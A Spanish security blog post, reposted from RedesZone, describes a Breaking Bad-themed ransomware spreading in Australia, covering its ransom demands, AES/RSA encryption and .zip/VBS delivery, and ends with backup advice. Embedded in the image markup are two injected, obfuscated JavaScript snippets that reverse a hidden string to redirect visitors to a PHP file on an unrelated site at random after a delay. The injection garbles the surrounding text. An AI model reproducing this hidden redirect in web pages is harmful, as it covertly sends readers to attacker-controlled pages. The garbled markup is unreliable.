Ransomware basado en Breaking Bad
Ransomware basado en Breaking Bad
El ransomware es un tipo de malware muy utilizado (por desgracia) en los últimos meses que se encarga de cifrar los datos de sus víctimas y pide un pago para poder recuperarlos o de lo contrario se pierden para siempre. Los piratas informáticos cada vez buscan nuevas técnicas para atacar a sus víctimas y nuevas formas de que su malware sea recordado tanto por las víctimas como por los investigadores de la red, ya sea por cómo funciona como por su nombre y forma de infección.
Recientemente una nueva y peligrosa pieza de ransomware está causando estragos en Australia (aunque ya ha comenzado a llegar a otros países). Este ransomware, al igual que otros, cifra los datos personales de sus víctimas y pide un pago de 450 dólares australianos por recuperarlos o 1000 dólares australianos si se pasa el plazo inicial. En la pantalla de información del malware se puede ver el logotipo de “Los pollos hermanos”, conocida franquicia de comida rápida de la popular serie Breaking Bad.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to.jpg?x=634″ alt=”” width=”478″ height=”294″ /><br />
<em>ransomware breaking bad fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to
Igualmente la dirección de correo electrónico de información se basa en una frase de uno de los personajes de la serie.
Aparte de la temática, este ransomware no es muy diferente de cualquier otro: tras infectar a sus víctimas comienza a cifrar todos los archivos de audio, vídeo, imágenes y documentos con un algoritmo AES y posteriormente con una clave pública RSA. Este ransomware se distribuye a través de ficheros .zip que, al abrirlo, ejecuta un script PENALTY.VBS encargado de descargar e instalar el malware en el sistema. También abre un documento pdf genuino para evitar levantar sospechas.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-2.png?x=634″ alt=”” width=”634″ height=”417″ /><br />
<em>ransomware breaking bad fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to 2
Como dato curioso queda indicar que los piratas informáticos han grabado un vídeo sobre cómo realizar el pago en Bitcoin y lo han subido a YouTube para que los usuarios víctimas de Los Pollos Hermanos puedan pagar, si así lo desean, y recuperar sus datos.
Para finalizar queremos recordar que la mejor forma de protegerse frente a este tipo de amenazas es siempre hacer copias de seguridad de todos los archivos y que nunca debemos pagar el rescate ya que en ocasiones anteriores algunos usuarios han pagado, han perdido el dinero y no han recuperado los datos.
Ver informacion al respecto en Fuente:
http://www.redeszone.net/2015/05/12/distribuyen-un-ransomware-basado-en-breaking-bad/
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.